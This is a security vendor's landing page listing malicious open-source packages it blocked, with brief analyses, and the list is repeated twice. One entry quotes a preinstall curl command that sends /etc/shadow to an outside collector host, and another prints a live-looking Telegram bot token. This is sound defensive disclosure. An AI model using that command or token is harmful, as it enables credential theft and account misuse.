Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 3.7.1

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.1.1

We protect you from vulnerable and malicious packages

chatgpt-node

1.0.4

Removed from npm

Blocked by Socket

The code poses a significant security risk and should not be used. If you have already used this package, take steps to secure your system and change your API key.

Live on npm for 171 days, 8 hours and 18 minutes before removal. Socket users were protected even while the package was live.

simba-uw-tf-dev

1.92.5

Live on PyPI

Blocked by Socket

The code has significant security risks due to the dynamic execution of user-defined code and the potential for command injection through subprocess calls. Proper validation and sanitization of user inputs are essential to mitigate these risks.

@volcenjine/tos-sdk

89.3.5

by mtdev008742

Live on npm

Blocked by Socket

The code collects and sends sensitive system information to potentially suspicious external domains without user consent, which is a significant security risk. The use of 'rejectUnauthorized: false' further exacerbates the risk by disabling SSL/TLS certificate validation.

print-vault-node

1.0.0

by city_30

Removed from npm

Blocked by Socket

The source code is malicious and poses a serious security risk. It stealthily collects and exfiltrates sensitive system and user information to a suspicious external server without user consent. This is a clear supply chain security incident involving data theft. The code is not obfuscated but is clearly designed for malicious data exfiltration.

Live on npm for 12 days, 6 hours and 18 minutes before removal. Socket users were protected even while the package was live.

tikche

0.1

by Spr3z

Live on PyPI

Blocked by Socket

The code is designed to check the availability of TikTok usernames and send the results to a Telegram bot. It sends sensitive information, including user session IDs and usernames, to the Telegram API at 'api[.]telegram[.]org' using hardcoded credentials, such as a Telegram bot token ('1316607340:AAEVQUBpR0OnPRs6THQFYrCoQBlBfvNsuxU') and chat ID. This behavior poses significant security risks, potentially allowing unauthorized access to user accounts. Additionally, the code reads usernames from 'user.txt' and writes found accounts to 'accountfound.txt', which may lead to unauthorized data exfiltration. The code makes unauthorized network requests to TikTok's API (e.g., 'www[.]tiktok[.]com/@{username}') and sends data to the Telegram bot without explicit user consent, indicating malicious intent.

testapi1232

1.0.3

by ezneeegoo123

Removed from npm

Blocked by Socket

This script is highly suspicious and malicious as it collects sensitive system information and sends it to an external server, posing a significant security risk.

Live on npm for 2 hours and 17 minutes before removal. Socket users were protected even while the package was live.

bytekafka

99.7

Removed from PyPI

Blocked by Socket

This file collects system information (hostname via platform.node(), username via getpass.getuser(), current working directory via os.getcwd()) and transmits it to external URLs, including dnipqouebm-psl[.]cn[.]oast-cn[.]byted-dast[.]com001, oqvignkp58-psl[.]i18n[.]oast-row[.]byted-dast[.]com/realtime_p/pypi/001, and sbfwstspuutiarcjzptf0rueg2x53eh2c[.]oast[.]fun. These domains appear suspicious and serve no legitimate functionality, strongly suggesting malicious intent. The internet requests include sensitive data, posing a high risk of unauthorized data exfiltration.

Live on PyPI for 54 minutes before removal. Socket users were protected even while the package was live.

gd-ldc

3.508.0

by hglsd0r

Removed from npm

Blocked by Socket

The code is designed to exfiltrate environment variables to a remote server if certain conditions are met, indicative of malicious behavior. The obfuscation of the destination server and the base64 encoding of the data are techniques to obscure the data being exfiltrated.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

bytekafka-0-15

98.7

Live on PyPI

Blocked by Socket

The code exhibits behavior consistent with data exfiltration by sending system information to suspicious external URLs. This poses a significant security risk.

discordd

1.6.8

by xfixxy311

Removed from npm

Blocked by Socket

The code is purposefully designed to collect sensitive user data from web browsers and send it to a backend server. It exhibits several suspicious and potentially malicious behaviors, including the reading and manipulation of browser data files, the extraction of sensitive information such as passwords and session tokens, and the sending of data to external servers. These actions are consistent with malware or unauthorized data collection. The code poses a significant security risk and should be treated with extreme caution.

Live on npm for 31 days, 15 hours and 17 minutes before removal. Socket users were protected even while the package was live.

jrmis

1.1.2

by mastertraining

Removed from npm

Blocked by Socket

The source code is malicious and poses a high security risk due to unauthorized exfiltration of sensitive system and environment data to an external endpoint. The code is not obfuscated but clearly designed to steal private information without user consent. The malformed HTTPS request options indicate poor coding but do not mitigate the malicious intent. This package should be considered dangerous and avoided.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

gd-react-toolbox

3.99.99

by 0xsombra

Removed from npm

Blocked by Socket

This code sends potentially sensitive environment data and file system information to a remote server without user consent, indicating malicious or at least unethical behavior. The hardcoded destination and lack of user control over the data sent highlight a significant security risk.

Live on npm for 1 hour and 10 minutes before removal. Socket users were protected even while the package was live.

nokia-smp

1.0.0

by rednapm

Removed from npm

Blocked by Socket

The script collects information from the user's system such as package data, directory paths, hostname, username, and DNS servers, and sends it to a remote server.

Live on npm for 14 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

7.2.2

Removed from npm

Blocked by Socket

Possible typosquat of azure - Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles legitimate Azure package naming conventions, which could confuse users. The maintainers list includes 'npm', which is not a specific known maintainer. Therefore, it is likely a typosquat.

Live on npm for 14 hours and 25 minutes before removal. Socket users were protected even while the package was live.

wdhr

1.0.137

by yy6869

Removed from npm

Blocked by Socket

The code contains multiple dynamic execution patterns and base64 encoded data that could potentially hide malicious behaviors or payloads. It lacks clear hardcoded credentials or known malicious domain connections, but the overall design leads to potential risks due to the execution of arbitrary data. It should be used with caution and further review is needed to ensure security.

Live on npm for 52 minutes before removal. Socket users were protected even while the package was live.

@univerjs-pro/sheets-chart

0.6.10-nightly.202504151606

by jikkai

Live on npm

Blocked by Socket

This code contains heavily obfuscated validation logic that uses unsafe dynamic code execution techniques. The obfuscation appears deliberate to hide functionality, and the use of new Function() creates a significant security risk. Without being able to fully deobfuscate the code, it's impossible to determine exactly what the dynamically generated code does, but the techniques used match those commonly found in malicious code.

package-resources

0.0.1

Removed from PyPI

Blocked by Socket

This code contains malicious functionality that executes automatically upon module import. It performs two suspicious activities: (1) prints a base64-encoded string 'Y2RoQHdlYXJlaGFja2Vyb25lLmNvbQ==' which decodes to the email address cdh@wearehackerone[.]com, and (2) attempts DNS resolution of the suspicious domain package_resources[.]pyvac[.]diar[.]ai. The use of obfuscated email addresses, automatic execution via underscore-prefixed functions, and network reconnaissance to suspicious domains are consistent with supply chain attack methodology. The domain name appears crafted to mimic legitimate package management infrastructure while potentially serving as a beacon or command-and-control endpoint. This has been removed from PyPI.

Live on PyPI for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

evenote-thrift

10.8.0

by raxis-evernote

Live on Rubygems

Blocked by Socket

This file collects and transmits sensitive system information (including hostname, user ID, and current directory) to a suspicious remote domain (example[.]com). Such unauthorized data exfiltration without user consent is indicative of malware.

cirrus-matchmaker

9999.99.99

by 0xwise64

Removed from npm

Blocked by Socket

The script collects information like hostname, platform, user info, and current path, then sends it to a remote server. Additionally, it writes a local file.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

@lideralia/alife-uikit

1.2.102

by lideralia

Live on npm

Blocked by Socket

This package contains heavily obfuscated code that prevents security analysis. The extreme obfuscation level is highly suspicious and commonly associated with malicious packages attempting to hide their true functionality. Cannot determine specific malicious behaviors without deobfuscation, but the obfuscation itself represents a significant security risk.

topcoderhomepage_3.0

1.0.2

by sadfdsafd

Removed from npm

Blocked by Socket

This script is attempting to exfiltrate system information by sending it to a remote server. This behavior is highly suspicious and potentially malicious.

Live on npm for 6 hours and 45 minutes before removal. Socket users were protected even while the package was live.

jito-components

6.1.23

by anarenhsaihan

Removed from npm

Blocked by Socket

This postinstall script automatically and silently launches a detached background Node.js process (daemon.js) during package installation, creating a persistent execution capability on users' machines. The script itself is small and non-obfuscated, but it enables a high-risk supply-chain behavior because the actual daemon (daemon.js) will run with user privileges, hidden stdio, and without lifecycle control from the installer. Treat the package as suspicious until daemon.js is reviewed and the package documents and obtains explicit user consent for installing a background agent. If daemon.js is unnecessary, remove or disable this postinstall behavior.

Live on npm for 11 hours and 50 minutes before removal. Socket users were protected even while the package was live.

erc4337

0.0.1

by snap_

Removed from npm

Blocked by Socket

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

nayan-media-downloader

2.0.7

by n4y4n

Removed from npm

Blocked by Socket

The code is highly obfuscated and uses eval to execute a decoded string, which is a significant security risk. The obfuscation and use of eval suggest potential malicious behavior, but the exact nature of the code cannot be determined without decoding the obfuscated string.

Live on npm for 149 days, 10 hours and 50 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

4.3.0

Removed from npm

Blocked by Socket

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 4 hours and 5 minutes before removal. Socket users were protected even while the package was live.

chatgpt-node

1.0.4

Removed from npm

Blocked by Socket

The code poses a significant security risk and should not be used. If you have already used this package, take steps to secure your system and change your API key.

Live on npm for 171 days, 8 hours and 18 minutes before removal. Socket users were protected even while the package was live.

simba-uw-tf-dev

1.92.5

Live on PyPI

Blocked by Socket

The code has significant security risks due to the dynamic execution of user-defined code and the potential for command injection through subprocess calls. Proper validation and sanitization of user inputs are essential to mitigate these risks.

@volcenjine/tos-sdk

89.3.5

by mtdev008742

Live on npm

Blocked by Socket

The code collects and sends sensitive system information to potentially suspicious external domains without user consent, which is a significant security risk. The use of 'rejectUnauthorized: false' further exacerbates the risk by disabling SSL/TLS certificate validation.

print-vault-node

1.0.0

by city_30

Removed from npm

Blocked by Socket

The source code is malicious and poses a serious security risk. It stealthily collects and exfiltrates sensitive system and user information to a suspicious external server without user consent. This is a clear supply chain security incident involving data theft. The code is not obfuscated but is clearly designed for malicious data exfiltration.

Live on npm for 12 days, 6 hours and 18 minutes before removal. Socket users were protected even while the package was live.

tikche

0.1

by Spr3z

Live on PyPI

Blocked by Socket

The code is designed to check the availability of TikTok usernames and send the results to a Telegram bot. It sends sensitive information, including user session IDs and usernames, to the Telegram API at 'api[.]telegram[.]org' using hardcoded credentials, such as a Telegram bot token ('1316607340:AAEVQUBpR0OnPRs6THQFYrCoQBlBfvNsuxU') and chat ID. This behavior poses significant security risks, potentially allowing unauthorized access to user accounts. Additionally, the code reads usernames from 'user.txt' and writes found accounts to 'accountfound.txt', which may lead to unauthorized data exfiltration. The code makes unauthorized network requests to TikTok's API (e.g., 'www[.]tiktok[.]com/@{username}') and sends data to the Telegram bot without explicit user consent, indicating malicious intent.

testapi1232

1.0.3

by ezneeegoo123

Removed from npm

Blocked by Socket

This script is highly suspicious and malicious as it collects sensitive system information and sends it to an external server, posing a significant security risk.

Live on npm for 2 hours and 17 minutes before removal. Socket users were protected even while the package was live.

bytekafka

99.7

Removed from PyPI

Blocked by Socket

This file collects system information (hostname via platform.node(), username via getpass.getuser(), current working directory via os.getcwd()) and transmits it to external URLs, including dnipqouebm-psl[.]cn[.]oast-cn[.]byted-dast[.]com001, oqvignkp58-psl[.]i18n[.]oast-row[.]byted-dast[.]com/realtime_p/pypi/001, and sbfwstspuutiarcjzptf0rueg2x53eh2c[.]oast[.]fun. These domains appear suspicious and serve no legitimate functionality, strongly suggesting malicious intent. The internet requests include sensitive data, posing a high risk of unauthorized data exfiltration.

Live on PyPI for 54 minutes before removal. Socket users were protected even while the package was live.

gd-ldc

3.508.0

by hglsd0r

Removed from npm

Blocked by Socket

The code is designed to exfiltrate environment variables to a remote server if certain conditions are met, indicative of malicious behavior. The obfuscation of the destination server and the base64 encoding of the data are techniques to obscure the data being exfiltrated.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

bytekafka-0-15

98.7

Live on PyPI

Blocked by Socket

The code exhibits behavior consistent with data exfiltration by sending system information to suspicious external URLs. This poses a significant security risk.

discordd

1.6.8

by xfixxy311

Removed from npm

Blocked by Socket

The code is purposefully designed to collect sensitive user data from web browsers and send it to a backend server. It exhibits several suspicious and potentially malicious behaviors, including the reading and manipulation of browser data files, the extraction of sensitive information such as passwords and session tokens, and the sending of data to external servers. These actions are consistent with malware or unauthorized data collection. The code poses a significant security risk and should be treated with extreme caution.

Live on npm for 31 days, 15 hours and 17 minutes before removal. Socket users were protected even while the package was live.

jrmis

1.1.2

by mastertraining

Removed from npm

Blocked by Socket

The source code is malicious and poses a high security risk due to unauthorized exfiltration of sensitive system and environment data to an external endpoint. The code is not obfuscated but clearly designed to steal private information without user consent. The malformed HTTPS request options indicate poor coding but do not mitigate the malicious intent. This package should be considered dangerous and avoided.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

gd-react-toolbox

3.99.99

by 0xsombra

Removed from npm

Blocked by Socket

This code sends potentially sensitive environment data and file system information to a remote server without user consent, indicating malicious or at least unethical behavior. The hardcoded destination and lack of user control over the data sent highlight a significant security risk.

Live on npm for 1 hour and 10 minutes before removal. Socket users were protected even while the package was live.

nokia-smp

1.0.0

by rednapm

Removed from npm

Blocked by Socket

The script collects information from the user's system such as package data, directory paths, hostname, username, and DNS servers, and sends it to a remote server.

Live on npm for 14 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

7.2.2

Removed from npm

Blocked by Socket

Possible typosquat of azure - Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles legitimate Azure package naming conventions, which could confuse users. The maintainers list includes 'npm', which is not a specific known maintainer. Therefore, it is likely a typosquat.

Live on npm for 14 hours and 25 minutes before removal. Socket users were protected even while the package was live.

wdhr

1.0.137

by yy6869

Removed from npm

Blocked by Socket

The code contains multiple dynamic execution patterns and base64 encoded data that could potentially hide malicious behaviors or payloads. It lacks clear hardcoded credentials or known malicious domain connections, but the overall design leads to potential risks due to the execution of arbitrary data. It should be used with caution and further review is needed to ensure security.

Live on npm for 52 minutes before removal. Socket users were protected even while the package was live.

@univerjs-pro/sheets-chart

0.6.10-nightly.202504151606

by jikkai

Live on npm

Blocked by Socket

This code contains heavily obfuscated validation logic that uses unsafe dynamic code execution techniques. The obfuscation appears deliberate to hide functionality, and the use of new Function() creates a significant security risk. Without being able to fully deobfuscate the code, it's impossible to determine exactly what the dynamically generated code does, but the techniques used match those commonly found in malicious code.

package-resources

0.0.1

Removed from PyPI

Blocked by Socket

This code contains malicious functionality that executes automatically upon module import. It performs two suspicious activities: (1) prints a base64-encoded string 'Y2RoQHdlYXJlaGFja2Vyb25lLmNvbQ==' which decodes to the email address cdh@wearehackerone[.]com, and (2) attempts DNS resolution of the suspicious domain package_resources[.]pyvac[.]diar[.]ai. The use of obfuscated email addresses, automatic execution via underscore-prefixed functions, and network reconnaissance to suspicious domains are consistent with supply chain attack methodology. The domain name appears crafted to mimic legitimate package management infrastructure while potentially serving as a beacon or command-and-control endpoint. This has been removed from PyPI.

Live on PyPI for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

evenote-thrift

10.8.0

by raxis-evernote

Live on Rubygems

Blocked by Socket

This file collects and transmits sensitive system information (including hostname, user ID, and current directory) to a suspicious remote domain (example[.]com). Such unauthorized data exfiltration without user consent is indicative of malware.

cirrus-matchmaker

9999.99.99

by 0xwise64

Removed from npm

Blocked by Socket

The script collects information like hostname, platform, user info, and current path, then sends it to a remote server. Additionally, it writes a local file.

Live on npm for 13 minutes before removal. Socket users were protected even while the package was live.

@lideralia/alife-uikit

1.2.102

by lideralia

Live on npm

Blocked by Socket

This package contains heavily obfuscated code that prevents security analysis. The extreme obfuscation level is highly suspicious and commonly associated with malicious packages attempting to hide their true functionality. Cannot determine specific malicious behaviors without deobfuscation, but the obfuscation itself represents a significant security risk.

topcoderhomepage_3.0

1.0.2

by sadfdsafd

Removed from npm

Blocked by Socket

This script is attempting to exfiltrate system information by sending it to a remote server. This behavior is highly suspicious and potentially malicious.

Live on npm for 6 hours and 45 minutes before removal. Socket users were protected even while the package was live.

jito-components

6.1.23

by anarenhsaihan

Removed from npm

Blocked by Socket

This postinstall script automatically and silently launches a detached background Node.js process (daemon.js) during package installation, creating a persistent execution capability on users' machines. The script itself is small and non-obfuscated, but it enables a high-risk supply-chain behavior because the actual daemon (daemon.js) will run with user privileges, hidden stdio, and without lifecycle control from the installer. Treat the package as suspicious until daemon.js is reviewed and the package documents and obtains explicit user consent for installing a background agent. If daemon.js is unnecessary, remove or disable this postinstall behavior.

Live on npm for 11 hours and 50 minutes before removal. Socket users were protected even while the package was live.

erc4337

0.0.1

by snap_

Removed from npm

Blocked by Socket

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

nayan-media-downloader

2.0.7

by n4y4n

Removed from npm

Blocked by Socket

The code is highly obfuscated and uses eval to execute a decoded string, which is a significant security risk. The obfuscation and use of eval suggest potential malicious behavior, but the exact nature of the code cannot be determined without decoding the obfuscated string.

Live on npm for 149 days, 10 hours and 50 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

4.3.0

Removed from npm

Blocked by Socket

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 4 hours and 5 minutes before removal. Socket users were protected even while the package was live.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Known malware

Possible typosquat attack

Chrome Extension Permission

Chrome Extension Wildcard Host Permission

NPM Shrinkwrap

Git dependency

HTTP dependency

Suspicious Stars on GitHub

Protestware or potentially unwanted behavior

Unstable ownership

25 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Dec 14, 2023

Hijacked cryptocurrency library adds malware

Widely-used library in cryptocurrency frontend was compromised to include wallet-draining code, following the hijacking of NPM account credentials via phishing.

Jan 06, 2022

Maintainer intentionally adds malware

Rogue maintainer sabotages his own open source package with 100M downloads/month, notably breaking Amazon's AWS SDK.

Nov 15, 2021

npm discovers a platform vulnerability allowing unauthorized publishing of any package

Attackers could publish new versions of any npm package without authorization for multiple years.

Oct 22, 2021

Hijacked package adds cryptominers and password-stealing malware

Multiple packages with 30M downloads/month are hijacked and publish malicious versions directly into the software supply chain.

Nov 26, 2018

Package hijacked adding organization specific backdoors

Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles
SocketSocket SOC 2 Logo

Product

About

Packages

Stay in touch

Get open source security insights delivered straight into your inbox.

  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc

U.S. Patent No. 12,346,443 & 12,314,394. Other pending.